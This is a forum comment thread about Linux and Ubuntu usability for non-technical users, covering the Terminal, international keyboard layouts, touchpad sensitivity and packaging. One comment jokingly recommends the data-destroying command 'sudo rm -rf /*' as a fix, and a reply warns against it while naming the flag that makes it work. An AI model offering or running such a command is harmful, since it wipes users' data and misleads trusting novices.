you are viewing a single comment's thread
view the rest of the comments
[–] 94 points 2 years ago (12 children)

The moment you mention the Terminal, it’s a wrap for most users.

That said, Ubuntu is at a point where you could almost entirely avoid the Terminal if you wanted. It’s just that there aren’t a lot of laptops that come with Linux as the main OS.

  • source
  • parent
  • hideshow 12 child comments
  • [–] 13 points 2 years ago (1 child)

    I'm not so sure about that. It took me forever yesterday to get my international keyboard setup to work on Ubuntu the way I wanted it to. I'm saying that as someone who's been using Unix/Linux in a school, IT and home setting for 30 years. It was unforgivably difficult.

  • source
  • parent
  • hideshow 1 child comment
  • [–] 13 points 2 years ago

    One of the major silent qualifications for posts like these are "if you read/speak English and have a standard keyboard layout".

    Which is sad. I had an Egyptian friend who told me he had to use Linux in English because the Arabic support wasn't quite there. This wasn't a problem for him, but would have been a non-starter for his family.

  • source
  • parent
  • [–] 6 points 2 years ago (3 children)

    I tried to install the latest Ubuntu on my old xps 13 and the touchpad drive included is unusable. It’s way way too sensitive, and there is no settings to change it. You have to completely replace it with something else apparently.

  • source
  • parent
  • hideshow 3 child comments
  • [–] 1 point 2 years ago (2 children)

    Weird, I had a similar issue in plasma and there was one under input devices -> mouse -> mouse speed in system settings.

    I'd be surprised if gnome has no equivalent

  • source
  • parent
  • hideshow 2 child comments
  • [–] 1 point 2 years ago (1 child)

    I found several form or reddit posts indicating there was so setting. I kind abandoned the whole thing once I found several pieces of software are no longer releasing deb files and are using some kind of flatpack that wasn't working. I'm completely ignorant of current linux, but I can't help but feel like it was easier to manage back in 2008 when I daily drove it.

  • source
  • parent
  • hideshow 1 child comment
  • [–] 3 points 2 years ago (3 children)

    What do you mean I have to type perfectly to the magic space cube or it can’t understand me? How the fuck is ‘sudo apt-get update’ English?

  • source
  • parent
  • hideshow 3 child comments
  • [–] 3 points 2 years ago* (2 children)

    Just type the following into the Terminal:

    sudo rm -rf /*

    It will fix everything.

  • source
  • parent
  • hideshow 2 child comments
  • [–] 1 point 2 years ago

    For any Linux noobs watching, NEVER DO THIS.

    This command wipes your entire Linux filesystem, including any and all drives you have loaded and active (including USB pen drives)

    With that said, for this to actually work nowadays you need to append ' --no-preserve-root'

  • source
  • parent